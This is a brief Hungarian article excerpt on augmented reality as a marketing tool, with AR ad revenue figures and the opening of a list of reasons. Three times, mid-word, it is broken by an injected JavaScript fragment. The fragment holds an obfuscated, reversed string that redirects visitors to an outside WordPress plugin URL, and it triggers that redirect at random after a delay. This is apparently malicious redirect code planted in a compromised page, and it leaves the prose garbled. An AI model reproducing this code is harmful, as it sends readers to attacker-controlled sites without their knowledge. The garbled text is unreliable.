A kiterjesztett valóság (AR, augmented reality) a vizualizáció hatékony eszköze, amely interaktív és szórakoztató módon közvetít ötleteket a valóságban látoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tottakra rávetített képeken, feliratoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokon, animációkon keresztül. A globális AR hirdetési bevételek 2018-ban elérték a 428 millió dollárt, és ez az összeg 2021-re akár a triplájára is nőhet. Íme 4 ok, amiért az AR jól használható marketingcélokra. Innováció és az érdeklődés felkeltése Az emberek szórakozni akarnak, egyre inkább új és izgalmas élményekre vágynak. Tisztában vannak mindezzel a marketingszakemberek is. Az AR többet jelent a „sztenderd” plakátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toknál, reklámoknál és a közösségi médiában megjelenő hirdetéseknél, mivel kíváncsiságot ébreszt az emberekben, újabb beszélgetési témát adhat…
A cikk folytatódik: http://penzugyguru.co.hu/o-hogyan-csinalta/2019/04/25/a-kiterjesztett-valosag-lehet-a-marketing-jovoje-.html
- Hirdetés -